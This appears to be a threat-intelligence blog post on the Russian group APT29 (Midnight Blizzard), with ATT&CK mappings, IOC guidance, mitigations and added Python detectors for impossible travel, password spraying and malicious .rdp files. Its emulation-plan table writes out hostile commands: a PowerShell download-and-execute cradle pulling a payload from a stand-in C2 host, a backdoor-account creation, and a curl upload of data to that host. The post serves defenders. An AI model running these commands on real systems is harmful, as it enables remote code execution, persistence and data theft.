APT29 (Midnight Blizzard): Operations, IOCs, Tactics, Detection Strategies
Mar 7 (updated Mar 28)

Introduction
APT29, also known as Midnight Blizzard, NOBELIUM, Cozy Bear, The Dukes, Dark Halo, and UNC2452, is a Russian state-sponsored cyber espionage group attributed to the Foreign Intelligence Service of the Russian Federation (SVR). Active since at least 2008, the group has become one of the most searched and referenced nation-state actors in the industry, known for high-impact operations including the 2020 SolarWinds supply chain compromise (affecting 18,000+ organizations), the 2024 breach of Microsoft corporate systems, and large-scale spear-phishing campaigns against government, defense, academia, and NGOs.
In this blog, we explore APT29's tactics, techniques, and procedures (TTPs), provide updated indicators of compromise (IOCs), and share an emulation plan to help defenders detect and mitigate this persistent, well-resourced threat.
APT29's Modus Operandi
APT29 pursues long-term intelligence collection against governments, diplomatic entities, think tanks, IT service providers, and critical infrastructure, with a strong focus on the United States and Europe. The group combines stolen credentials, password spraying, supply chain and trust-chain abuse, and cloud-focused tactics to gain and maintain access. Recent activity emphasizes cloud and hybrid environments, delegated administrative privileges, and signed malicious files (e.g., RDP configuration files) to evade detection and leverage trusted services.
Commonly Used Techniques
Spear-Phishing and Credential Theft: APT29 runs large-scale spear-phishing campaigns using weaponized attachments and links. In October 2024, Microsoft reported campaigns distributing signed Remote Desktop Protocol (RDP) configuration files to thousands of individuals across 100+ organizations in government, academia, defense, and NGOs. Password spraying and use of valid cloud accounts (T1078.004) are common for initial access.
Supply Chain and Trust Exploitation: The group has a history of supply chain operations (e.g., SolarWinds) and abusing trust relationships with service providers. Tactics include targeting on-premises environments to pivot into cloud, exploiting delegated admin and federation (e.g., ADFS), and using custom ADFS-focused malware such as FOGGYWEB and MAGICWEB.
Cloud and Identity Abuse: SVR actors adapt TTPs for cloud-first access: abuse of cloud tokens, device enrollment, and residential proxy infrastructure (T1090.002) for command-and-control (C2) to blend with normal traffic. Account manipulation (T1098) and creation of accounts (T1136) support persistence.
Custom and Commodity Malware: APT29 uses Cobalt Strike Beacon, CozyDuke, and various Duke family implants. Execution often involves PowerShell, WMI, and signed or otherwise trusted file types to reduce suspicion.
Defense Evasion: Use of alternate authentication material (T1550), impersonation (T1656), and exfiltration over C2 channels (T1041) is routinely observed. The group invests in operational security and infrastructure that mimics legitimate traffic.
Recent Activity (2024–2025)
January 2024: Midnight Blizzard attacked Microsoft's corporate systems and other U.S. technology companies, accessing corporate email and source code repositories. The incident underscored the actor's ability to compromise highly secured enterprises.
February 2024: CISA, NCSC-UK, and international partners released advisory AA24-057A, "SVR Cyber Actors Adapt Tactics for Initial Cloud Access," detailing APT29's evolving tactics for gaining and maintaining access in cloud and hybrid environments.
October 2024: Midnight Blizzard conducted a large-scale spear-phishing campaign (starting October 22) using signed RDP configuration files. Emails targeted thousands of users across government, academia, defense, and NGOs, with an assessed goal of intelligence collection.
Ongoing: The group remains among the most active APT actors, with continued focus on transportation, shipping, telecommunications, and government sectors. Threat intelligence vendors consistently rank APT29 in the top tier of state-sponsored activity.
Key Indicators of Compromise (IOCs)
The following IOCs are associated with APT29/Midnight Blizzard campaigns. Infrastructure and hashes rotate; use CISA advisories (e.g., AA24-057A), Microsoft Security Blog, and vendor reports for the latest indicators.
Domains and Infrastructure
APT29 frequently uses residential proxy networks and cloud services for C2 and to obscure origin. Domain patterns often mimic legitimate services or use short-lived registrations.
Refer to CISA AA24-057A and Microsoft's Midnight Blizzard guidance for current domain and URL IOCs; the group rotates infrastructure aggressively.
Authentication and Cloud
Monitor for unusual cloud sign-ins (e.g., geographic anomalies, impossible travel), token theft, and abuse of delegated administrative privileges.
ADFS and federation abuse: watch for FOGGYWEB/MAGICWEB and unexpected token issuance or consent grants.
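As an added example (not code from the original post), the two sign-in patterns described above can be checked over exported sign-in logs: consecutive successful sign-ins by one user that imply impossible travel, plus the single-source, many-account failure shape of password spraying (T1110.003) that the page lists among the group's techniques. The records, IP addresses, coordinates and the 900 km/h threshold below are constructed assumptions, not real telemetry.

```python
from collections import defaultdict
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

# Constructed sign-in records (not from any real tenant); lat/lon stand in
# for the geolocation a SIEM attaches to the source IP.
SIGN_INS = [
    {"user": "alice", "ts": "2024-10-22T08:00:00", "ip": "203.0.113.10", "lat": 38.9, "lon": -77.0, "ok": True},
    {"user": "alice", "ts": "2024-10-22T08:40:00", "ip": "198.51.100.7", "lat": 52.5, "lon": 13.4, "ok": True},
    {"user": "bob", "ts": "2024-10-22T09:00:00", "ip": "203.0.113.10", "lat": 38.9, "lon": -77.0, "ok": True},
    {"user": "bob", "ts": "2024-10-22T13:00:00", "ip": "203.0.113.11", "lat": 40.7, "lon": -74.0, "ok": True},
    # One source, many accounts, one failure each: the password-spray shape.
    {"user": "carol", "ts": "2024-10-22T02:00:00", "ip": "192.0.2.55", "lat": 41.8, "lon": -87.6, "ok": False},
    {"user": "dave", "ts": "2024-10-22T02:00:20", "ip": "192.0.2.55", "lat": 41.8, "lon": -87.6, "ok": False},
    {"user": "erin", "ts": "2024-10-22T02:00:45", "ip": "192.0.2.55", "lat": 41.8, "lon": -87.6, "ok": False},
    {"user": "frank", "ts": "2024-10-22T02:01:10", "ip": "192.0.2.55", "lat": 41.8, "lon": -87.6, "ok": False},
]

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in km between two points."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))

def impossible_travel(events, max_speed_kmh=900.0):
    """Return (user, from_ip, to_ip, implied_speed_kmh) for successive successful sign-ins faster than an airliner."""
    by_user = defaultdict(list)
    for e in events:
        if e["ok"]:
            by_user[e["user"]].append(e)
    hits = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])  # ISO-8601 strings sort chronologically
        for prev, cur in zip(evs, evs[1:]):
            delta = datetime.fromisoformat(cur["ts"]) - datetime.fromisoformat(prev["ts"])
            hours = delta.total_seconds() / 3600
            km = haversine_km(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
            # Same timestamp from two different places is also impossible travel.
            speed = km / hours if hours > 0 else (float("inf") if km > 0 else 0.0)
            if speed > max_speed_kmh:
                hits.append((user, prev["ip"], cur["ip"], round(speed, 1)))
    return hits

def password_spray_sources(events, min_users=3):
    """Source IPs whose failed sign-ins touch at least min_users distinct accounts."""
    failed = defaultdict(set)
    for e in events:
        if not e["ok"]:
            failed[e["ip"]].add(e["user"])
    return sorted(ip for ip, users in failed.items() if len(users) >= min_users)
```

Residential-proxy C2 (T1090.002) means the spraying source may itself rotate, so in practice the spray check is run per ASN or per user-agent as well as per IP.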
File and Execution
Signed RDP (.rdp) configuration files used in spear-phishing (2024 campaign). Inspect RDP files for embedded credentials or pointers to attacker-controlled infrastructure.
Cobalt Strike Beacon and Duke-family malware hashes are published in CISA and vendor advisories; maintain an updated feed.
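As an added example, not code from the original post, a small inspector for the .rdp lure files described above: it parses the name:type:value lines of an RDP configuration file, then flags a target host outside an allowlist, any enabled local-resource redirection, and pre-filled credentials or a remote program launch. The allowlist, the finding categories and the sample lure (with a placeholder host) are constructed assumptions.

```python
from dataclasses import dataclass

# Documented .rdp settings that hand local resources to the remote host or
# start a program on connect; the reason strings are ours.
RISKY_SETTINGS = {
    "drivestoredirect": "maps local drives into the remote session",
    "redirectclipboard": "shares the clipboard with the remote host",
    "redirectsmartcards": "exposes smart cards to the remote host",
    "redirectprinters": "redirects printers",
    "redirectcomports": "redirects COM ports",
    "devicestoredirect": "redirects plug-and-play devices",
    "remoteapplicationmode": "RemoteApp mode: a remote program runs at connect",
}
CREDENTIAL_KEYS = ("username", "password 51", "alternate shell", "remoteapplicationprogram")

@dataclass
class Finding:
    key: str
    value: str
    reason: str

def parse_rdp(text: str) -> dict:
    """Parse 'name:type:value' lines into {name: (type, value)}; values may contain ':'."""
    settings = {}
    for raw in text.splitlines():
        parts = raw.strip().split(":", 2)
        if len(parts) == 3:
            settings[parts[0].strip().lower()] = (parts[1].strip().lower(), parts[2].strip())
    return settings

def inspect_rdp(text: str, allowed_hosts: set) -> list:
    """Return findings for an .rdp file; an empty list means nothing suspicious."""
    s = parse_rdp(text)
    findings = []
    host = s.get("full address", ("s", ""))[1]
    if host.rsplit(":", 1)[0].lower() not in allowed_hosts:  # drop :port (hostname/IPv4)
        findings.append(Finding("full address", host, "target host is not on the allowlist"))
    for key, reason in RISKY_SETTINGS.items():
        if key in s:
            typ, value = s[key]
            if (typ == "i" and value not in ("", "0")) or (typ == "s" and value):
                findings.append(Finding(key, value, reason))
    for key in CREDENTIAL_KEYS:
        if s.get(key, ("", ""))[1]:
            findings.append(Finding(key, s[key][1], "pre-populated credential or program launch"))
    return findings

# Constructed lure: placeholder host, redirection switched on, username pre-filled.
SAMPLE_LURE = """\
full address:s:rdp.attacker-controlled.example:3389
remoteapplicationmode:i:0
drivestoredirect:s:*
redirectclipboard:i:1
redirectsmartcards:i:1
redirectprinters:i:1
username:s:victim@corp.example
"""
```

A valid Authenticode signature on the file says nothing about these settings, so the check belongs in the mail gateway or EDR regardless of signer.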
File hashes (SHA-1)
Published SHA-1 hashes associated with APT29/Midnight Blizzard campaigns, covering malware, signed lures and related artifacts, can be used for file-based hunting, blocklisting in EDR or email security, and correlation in your SIEM or threat-intel platform. Because the group frequently retires and replaces infrastructure, treat any such list as a snapshot and cross-reference CISA advisories and vendor reports for the latest hashes.
Tactics, Techniques, and Procedures (TTPs)
APT29 is tracked as MITRE ATT&CK group G0016. Below is a condensed mapping of techniques commonly associated with Midnight Blizzard:
| Category | MITRE ATT&CK ID | Description |
|---|---|---|
| Initial Access | T1078.004 | Valid Accounts: Cloud Accounts |
| Initial Access | T1566.001 | Phishing: Spear-phishing Attachment |
| Initial Access | T1566.002 | Phishing: Spear-phishing Link |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell |
| Execution | T1047 | Windows Management Instrumentation |
| Execution | T1204 | User Execution: Malicious Link or File |
| Persistence | T1098 | Account Manipulation |
| Persistence | T1136 | Create Account |
| Persistence | T1547.001 | Boot or Logon Autostart: Registry Run Keys |
| Credential Access | T1110.003 | Brute Force: Password Spraying |
| Defense Evasion | T1550 | Use Alternate Authentication Material |
| Defense Evasion | T1656 | Impersonation |
| Command and Control | T1090.002 | Proxy: External Proxy (e.g., residential) |
| Exfiltration | T1041 | Exfiltration Over C2 Channel |
Emulation Plan for APT29
Environment Setup
| Component | Details |
|---|---|
| Active Directory (AD) | 2 Windows Servers + 3 Windows Clients |
| Endpoints | 2 Linux, 2 Windows 10/11 |
| SIEM/XDR | ELK Stack / Splunk / Microsoft Sentinel |
| Network Monitoring | Suricata / Zeek |
| Cloud | Azure AD / M365 tenant (lab) for cloud TTPs |
| C2 Framework | Cobalt Strike / Covenant |
Emulation Actions
| Tactic | Emulation Actions | Tools/Commands |
|---|---|---|
| Reconnaissance | OSINT for target emails and cloud usage; identify high-value roles and delegated admin. | theHarvester, O365/enum tools |
| Initial Access | Spear-phish with signed RDP file or document; password spray low-complexity accounts. | GoPhish, RDP file lure, SprayingToolkit |
| Execution | Run PowerShell implants; use WMI for execution. | IEX (New-Object Net.WebClient).DownloadString('http://c2/payload.ps1') |
| Persistence | Add backdoor accounts; Registry Run keys; cloud app consent. | net user backdoor /add; reg add HKCU...\Run |
| Credential Access | Dump credentials; abuse cloud tokens; capture NTLM. | Mimikatz, AAD token abuse |
| C2 | Use HTTPS C2 via residential proxy or cloud front. | Cobalt Strike, Malleable C2 |
| Exfiltration | Exfil over C2 or staged to cloud storage. | curl -F "file=@data.zip" https://c2/upload |
Mitigation Strategies
To defend against APT29 and similar SVR-backed threats:
Identity and Cloud Hardening: Enforce phishing-resistant MFA, conditional access, and least-privilege for cloud and delegated admin. Monitor for impossible travel, token anomalies, and unusual consent or device enrollment.
Email and Endpoint Security: Block or alert on malicious RDP files and unusual attachments. Use EDR to detect PowerShell execution, WMI abuse, and Cobalt Strike/Duke-like behaviors.
Supply Chain and Trust: Harden ADFS and federation; monitor for FOGGYWEB/MAGICWEB and anomalous token issuance. Assess third-party and service-provider access.
Threat Intelligence: Subscribe to CISA advisories (e.g., AA24-057A), Microsoft Security Blog (Midnight Blizzard), and vendor reports. Update IOCs and detection rules regularly; APT29 rotates infrastructure and TTPs.
Conclusion
APT29 (Midnight Blizzard) remains one of the most capable and widely tracked nation-state threat actors, with sustained operations against government, cloud, and enterprise environments. By understanding their TTPs, applying current IOCs, and emulating their behavior in controlled environments, defenders can improve detection and mitigation of this high-impact adversary.
References
Microsoft Security Blog – Midnight Blizzard: Guidance for responders on nation-state attack (Jan 2024): https://www.microsoft.com/en-us/security/blog/2024/01/25/midnight-blizzard-guidance-for-responders-on-nation-state-attack/
Microsoft Security Blog – Midnight Blizzard spear-phishing campaign using RDP files (Oct 2024): https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/
CISA AA24-057A – SVR Cyber Actors Adapt Tactics for Initial Cloud Access: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-057a
MITRE ATT&CK – APT29 (G0016): https://attack.mitre.org/groups/G0016/
Microsoft – Midnight Blizzard (actor profile): https://www.microsoft.com/en-us/security/security-insider/midnight-blizzard